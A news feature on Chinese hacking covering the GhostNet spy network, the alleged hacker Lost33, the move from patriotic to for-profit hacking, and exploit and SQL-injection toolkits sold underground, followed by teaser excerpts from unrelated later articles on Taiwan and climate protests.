IT wasn’t until Sunday of last week that Scott Henderson knew he’d been duped. The former US army intelligence officer, along with his colleague “Jumper” had been tracking an alleged Chinese hacker, nicknamed Lost33, who had promised him an interview. “Lost33 did not make contact with Jumper last night. In fact, it seems he spent the night changing his QQ number” — QQ is a popular Chinese instant messaging service — “and deleting all info from his blog. The Web site is now completely empty, except for a change to his personal data,” said Henderson on his blog (bit.ly/darkvisitor).
Henderson had been tracking Lost33 after his e-mail address — losttemp33@hotmail.com — turned up in an investigation called GhostNet (bit.ly/ghostnet2). GhostNet started when Information Warfare Monitor (IWF, bit.ly/infowar), a team of cyberwarfare researchers created by the University of Toronto and the Canadian security think tank SecDev, had been asked to conduct a security audit for the Tibetan government in exile. It had found malicious software on the Dalai Lama’s most sensitive computers.
The investigation found links back to command and control servers located mainly in China. From there, the IWF found infected computers under the control of those servers in 103 countries. They identified roughly a third of them, and found them all to be sensitive computers in organizations important to Chinese interests, including numerous embassies, telecommunications companies, and even Vietnamese petroleum firms. Just as Lost33’s identity and motives are shrouded in mystery, the final link between GhostNet and the Chinese government is also lacking.
Ostensibly, this looks like a state-sponsored cyber-spying ring. Especially when you read the part of the report in which a member of an online Tibetan outreach project was detained for two months and interrogated by Chinese officials. They presented her with copies of her Internet chat logs. The project’s machines were compromised by the same malware that filched the Dalai Lama’s files, and communicated with the GhostNet control servers.
But there could be other motives and actors, says the IWF. GhostNet could be a
for-profit initiative, operated by cyber-criminals. It could be operated from outside China, using compromised Chinese computers as proxies (one of the control servers — also the first to be shut down when GhostNet was discovered — was based in the US).
“Even ‘patriotic hackers’ could be acting on their own volition, or with the tacit approval of their government, as operators of the GhostNet,” says the IWF report. The problem is that all of these things are happening in China anyway. Henderson says that patriotic hacking has been a mainstay of the Chinese hacking underground since the mid-1990s.
After the Internet arrived in China in 1994, people began experimenting with the technology, and in 1997, the Green Army hacker group was formed. This gave way to the Red Hacker Alliance, a loosely connected set of groups that emerged after the Jakarta riots of 1998, when Chinese nationals were accused of destabilizing the country. Indonesian Web sites were defaced by outraged Chinese hackers, and a nationalistic movement took on force.
Since then, for-profit motives have emerged. “The history has changed from being a group wanting to protect the motherland, to being specialized hacker groups that are there for the purpose of making money,” Henderson says. Now, for example, hackers have broken the rule of thumb that prevented them from attacking Chinese IP addresses. That wouldn’t have been appropriate when cyber-attacks were motivated by nationalism. Now, in the age of commercialized cybercrime, anyone is fair game.
Zhao Wei (趙薇), co-founder of the Chinese Anti-Malware Alliance (中國反惡意軟件聯盟), has been battling against the hacker underground since 2006. He says that hackers in China are growing in number, due in part to the economic downturn — and that Chinese nationals are just as vulnerable to poor security in Chinese cyberspace.
“At least 20 million people in China lost their jobs, and after they spend all of their money … then they may turn to cybercrime,” says Wei. He adds that the online crime wave is spreading to smaller cities, which shot up in great numbers during the economic boom. Phishing and other cybercrime has supplanted physical crime in some of these places.
After all, why risk harsh punishment for ripping off a warehouse when you can rip off people electronically with scant fear of retribution? “The policemen think it’s cool. There’s no one on the street. They’re all going to the bar, and they’re working on phishing. The policemen love the Internet,” Wei says.
In addition to phishing and hacking Web sites, Chinese hackers have also exploited flaws in local third-party applications, which are often badly written, Wei says. China, known for its lax view of intellectual property, is rife with pirated copies of Windows software — local companies now provide their own security update services for the company’s software, he says.
So what are Chinese hackers looking for on their victims’ machines? Much the same as hackers outside the country, but online games accounts are also targeted, and World of Warcraft, the most popular multiplayer game worldwide, is a particular prize. Accumulated gold and character points from this game can be sold on the open market.
Attacks from Chinese hackers can also be more sophisticated. Dennis Dwyer, a threat intelligence analyst at the Atlanta-based managed security services firm SecureWorks, says that targeted attacks are a signature technique perfected by Chinese cyber-criminals. They will conduct extensive research on an organization to understand which individuals work there and how they’re related.
“What we have seen is very specific malware. They’ll be looking for people using a certain version of Word,” says Dwyer. The GhostNet report demonstrates how hackers persuaded victims to open infectious files by attaching them to e-mails supposedly from people they knew.
“We also see the use of zero-day or file format type exploits [malware applications],” confirms Dwyer. “In particular, we watch a group called Phantom. They’re very public about what they do. What they typically don’t do is use [the exploits] themselves. They sell them for others to use.”
This trend of selling exploits on the open market is now gravitating toward selling toolkits. SecureWorks has identified a new kit — Leopard in a Hole — that automates the kind of SQL injection attacks for which Chinese hackers have become famous. This time last year, Chinese hackers compromised tens of thousands of Web sites with malicious JavaScript. Versions of Leopard in a Hole that essentially allow
non-technical attackers to do this with a just a few mouse clicks have been found on sale for up to US$500. Online crime is now big business.
In all of this, one unanswered question remains. Who was responsible for GhostNet? “It’s convenient to have privateers. People who are given the king’s warrant to act on his behalf, but who are kept at arm’s length,” says Rafal Rohozinski, principal analyst at the IWF and co-author of the report. He likens cyberspace to the high seas of old, which were populated by what amounted to freelance warships sanctioned by the state. “I think these are third-party actors. Whether they’re deliberately commissioned, protected or allowed to raise money from other activities that are overlooked, I don’t know.”
In China, more than perhaps anywhere else in the world, there is a bountiful supply of such cyber-swashbucklers. Who knows how many other treasure chests people may have buried in the world’s networks — or whether we will ever be able to prove the true identity of those that put them there?
Jan 13 to Jan 19 Yang Jen-huang (楊仁煌) recalls being slapped by his father when he asked about their Sakizaya heritage, telling him to never mention it otherwise they’ll be killed. “Only then did I start learning about the Karewan Incident,” he tells Mayaw Kilang in “The social culture and ethnic identification of the Sakizaya” (撒奇萊雅族的社會文化與民族認定). “Many of our elders are reluctant to call themselves Sakizaya, and are accustomed to living in Amis (Pangcah) society. Therefore, it’s up to the younger generation to push for official recognition, because there’s still a taboo with the older people.” Although the Sakizaya became Taiwan’s 13th
Earlier this month, a Hong Kong ship, Shunxin-39, was identified as the ship that had cut telecom cables on the seabed north of Keelung. The ship, owned out of Hong Kong and variously described as registered in Cameroon (as Shunxin-39) and Tanzania (as Xinshun-39), was originally People’s Republic of China (PRC)-flagged, but changed registries in 2024, according to Maritime Executive magazine. The Financial Times published tracking data for the ship showing it crossing a number of undersea cables off northern Taiwan over the course of several days. The intent was clear. Shunxin-39, which according to the Taiwan Coast Guard was crewed
China’s military launched a record number of warplane incursions around Taiwan last year as it builds its ability to launch full-scale invasion, something a former chief of Taiwan’s armed forces said Beijing could be capable of within a decade. Analysts said China’s relentless harassment had taken a toll on Taiwan’s resources, but had failed to convince them to capitulate, largely because the threat of invasion was still an empty one, for now. Xi Jinping’s (習近平) determination to annex Taiwan under what the president terms “reunification” is no secret. He has publicly and stridently promised to bring it under Communist party (CCP) control,
On Sept. 27 last year, three climate activists were arrested for throwing soup over Sunflowers by Vincent van Gogh at London’s National Gallery. The Just Stop Oil protest landed on international front pages. But will the action help further the activists’ cause to end fossil fuels? Scientists are beginning to find answers to this question. The number of protests more than tripled between 2006 and 2020 and researchers are working out which tactics are most likely to change public opinion, influence voting behavior, change policy or even overthrow political regimes. “We are experiencing the largest wave of protests in documented history,” says
RSS